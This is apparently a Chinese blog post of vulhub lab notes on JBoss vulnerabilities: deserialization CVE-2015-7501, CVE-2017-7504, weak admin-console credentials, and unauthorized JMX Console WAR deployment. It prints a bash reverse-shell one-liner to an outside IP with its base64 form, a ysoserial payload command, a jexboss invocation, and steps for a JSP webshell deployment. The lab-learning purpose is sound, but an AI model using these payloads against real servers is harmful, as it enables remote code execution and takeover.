Jboss漏洞

最新推荐文章于 2024-09-08 23:59:03 发布
最新推荐文章于 2024-09-08 23:59:03 发布
阅读量261 收藏 4
点赞数 5
分类专栏: 常用中间件漏洞 文章标签: Jboss
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140967577
版权

Jboss

Jboss介绍

JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。

3.1 CVE-2015-7501

Jboss JMXInvokerServlet 反序列化漏洞

漏洞介绍
这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的 Gadget 执行任意代码
影响范围
JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0
环境搭建
cd vulhub/jboss/JMXInvokerServlet-deserialization
docker-compose up -d

image-20240806212708834

漏洞复现
http://192.168.0.154:8080/

image-20240806213121558

1.POC,访问地址

http://192.168.0.154:8080/invoker/JMXInvokerServlet

返回如下,说明接⼝开放,此接⼝存在反序列化漏洞

image-20240806213235287

2.下载 ysoserial ⼯具进⾏漏洞利⽤

https://github.com/frohoff/ysoserial

将反弹shell进⾏base64编码

bash -i >&/dev/tcp/82.157.209.141/4444 0>&1
YmFzaCAtaSA+Ji9kZXYvdGNwLzgyLjE1Ny4yMDkuMTQxLzQ0NDQgMD4mMQ==

java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+Ji9kZXYvdGNwLzgyLjE1Ny4yMDkuMTQxLzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i} " >exp.ser

3.2 CVE-2017-7504

环境搭建
cd vulhub/jboss/CVE-2017-7504 
docker-compose up -d

image-20240806215027128

漏洞复现

1.访问漏洞地址

http://192.168.0.154:8080/jbossmq-httpil/HTTPServerILServlet

image-20240806220030354

python3 jexboss.py -u http://192.168.0.154:8080/

3.4 Administration Console弱⼝令

漏洞描述

Administration Console管理⻚⾯存在弱⼝令,admin:vulhub,登陆后台上传war包 , getshell

影响版本

全版本

环境搭建
cd vulhub-master/jboss/CVE-2017-12149 
docker-compose up -d
密码⽂件
/jboss-6.1.0.Final/server/default/conf/props/jmx-console-users.properties
账户密码:admin:vulhub
漏洞复现
http://1.15.136.212:8080/admin-console/login.seam?conversationId=4

3.5 低版本JMX Console未授权

3.6 ⾼版本JMX Console未授权

漏洞描述

JMX Console默认存在未授权访问,直接点击JBoss主⻚中的 JMX Console 链接进⼊JMX Console⻚ ⾯, 通过部署war包 , getshell

影响版本

Jboss6.x以下

环境搭建
cd vulhub/jboss/CVE-2017-12149 
docker-compose up -d
漏洞复现

http://1.15.136.212:8080/jmx-console/

因为使⽤环境不存在该漏洞所以需要输⼊账户密码:admin vulhub

image-20240806183529472

1.本地搭建部署点

image-20240806183609367

2.进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署

image-20240806183801426

用冰蝎生成jsp木马—>压缩到zip中—>改后缀名为.war

image-20240806184231831

image-20240806184302305

image-20240806184728571

PS:完任务版。下次一定做完。

黑白时光les
关注
专栏目录
jboss中间件漏洞总结
看不尽的尘埃——博客
02-09 6537
目录     前言   获取服务器所采用的中间件信息   JBOSS默认配置后台漏洞   弱口令/未授权访问   Jboss蠕虫   JMX控制台安全验证绕过漏洞(CVE-2010-0738)   反序列化漏洞   命令执行   拒绝服务   其他漏洞   总结   前言 昨天搞了Vulhub靶场里的jboss三个反序列化漏洞,今天总结一下jbo...
jboss端口修改说明
weixin_30546189的博客
01-29 150
1. jboss 的端口修改位置总结 Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个, 默认端口是8080 端口具体位置如下: Default Port Location Description 1099 \jboss\server\default\conf\...
修改jboss默认端口
最新发布
2403_87142815的博客
09-08 297
jboss修改默认端口
jboss 端口修改
10-09 226
1.jboss 的端口修改位置总结 Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个, 默认端口是8080 在windows系统中:  1098、1099、4444、4445、8083端口在/jboss/server/default/conf/jboss-service.xml中  8080端口在/jboss/serve...
jboss端口
happyangelling的专栏
07-30 609
Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个,默认端口是8080 在windows系统中: 1098、1099、4444、4445、8083端口在/jboss/server/default/conf/jboss-service.xml中 8080端口在/jboss/server/default/deploy/jboss-web.deployer/server.xml中 8093端口在/jboss/server/default/deploy/j
jboss端口说明
weixin_30527551的博客
07-08 174
jboss端口修改说明 1. jboss 的端口修改位置总结Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个, 默认端口是8080 端口具体位置如下: Default Port Location Description 1099 \...
jboss漏洞getshell工具.zip
08-26
例如,"jboss漏洞getshell工具.exe" 可能是一个用于利用此类漏洞的 Windows 平台上的工具。该程序可能包含以下功能: 1. **扫描和识别**:工具会自动扫描网络中的 JBoss 服务器,识别易受攻击的版本和配置。 2. **...
Jboss漏洞利用总结1
08-03
JBoss 漏洞利用总结】 JBoss 是一款基于 J2EE 的开源应用服务器,遵循 LGPL 许可,允许在商业应用中免费使用。它主要作为 EJB 容器和服务器,支持 EJB 1.1、2.0 和 3.0 规范。虽然 JBoss 核心服务不包含 Web 容器...
JBoss漏洞
公众号shadow sock7
05-26 477
CVE-2017-12149 /invoker/JMXInvokerServlet 反序列化 In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was found that the doFilter method in the ReadOnlyAccessFilter of the HTTP Invoker does not restrict classes for whi
Jboss漏洞利用小工具
11-06
提供的"Jboss漏洞利用小工具.jar"很可能是一个用于测试和演示JBoss漏洞的工具。这样的工具通常包含预设的exploits,可以模拟攻击者的行为,帮助管理员发现并修复潜在的安全问题。使用时需谨慎,避免在生产环境中...
JBoss端口修改
心如止水-GISer的成长之路
08-19 5932
Jboss6端口修改 推荐方式: 1.进入 %JBOSS_HOME%\server\default\conf\bindingservice.beans\META-INF 2. 编辑 bindings-jboss-beans.xml 3. 搜索 “8080″ ,格式如下:
JBOSS端口设置
weixin_34146805的博客
11-12 328
JBOSS5 [root@uumsproject jbossweb.sar]# ll total 4868 -rw-r--r-- 1 appman appman 625 Sep 15 2010 context.xml -rw-r--r-- 1 appman appman 1410325 Sep 15 2010 jasper-jdt.jar -...
jboss端口配置
weixin_33912638的博客
04-18 782
一、前言:JBoss启动时默认发布的不同的服务需要开放一些端口,如果只是简单地拷贝两套JBoss或者在一个JBoss中启动多个配置的话,同时启动多个JBoss实例会由于端口冲突而导致JBoss无法启动。JBoss默认发布的服务端口包括http协议的8080、AJP协议的8009、JNP服务的1099、RMI命名服务的1098、RMI/JRMP?invoker的4444端口等,...
jboss 的端口修改位置总结
热门推荐
xu_long的专栏
07-10 1万+
Jboss通常占用的端口是1098,1099,4444,4445,8080,8009,8083,8093这几个,默认端口是8080 在windows系统中: 1098、1099、4444、4445、8083端口在/jboss/server/default/conf/jboss-service.xml中 8080端口在/jboss/server/default/deploy/jboss-web.de
jboss使用端口和文件所在位置
itsnack
05-11 446
  jboss应用服务器占用了很对端口,如何配置它可能很麻烦,但是基于以下原因又不得不配置配置jboss端口的原因1.已经有一个tomcat已经使用了8080默认端口2.一组开发人员共享一台开发机器,每一个开发人员需要一个jboss实例.3.测试组想在同一台机器上测试不同版本的程序.4.想在同一台机器上发布多个jboss实例用于cluster,以便提高性能. jboss默认端口 ...
jboss修改服务器端口,解决如何在两个JBOSS部署在同一台服务器时端口占用问题...
weixin_31885123的博客
08-11 601
解决如何在两个JBOSS部署在同一台服务器时端口占用问题。当两个JBOSS部署在同一台服务器上时,需要修改下面的端口值1, jboss-4.2.2.GA\server\default\deploy\ejb3.deployer\META-INF下打开jboss-service.xml文件第12行修改3873的端口值name=”jboss.remoting:type=Connector,name=De...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值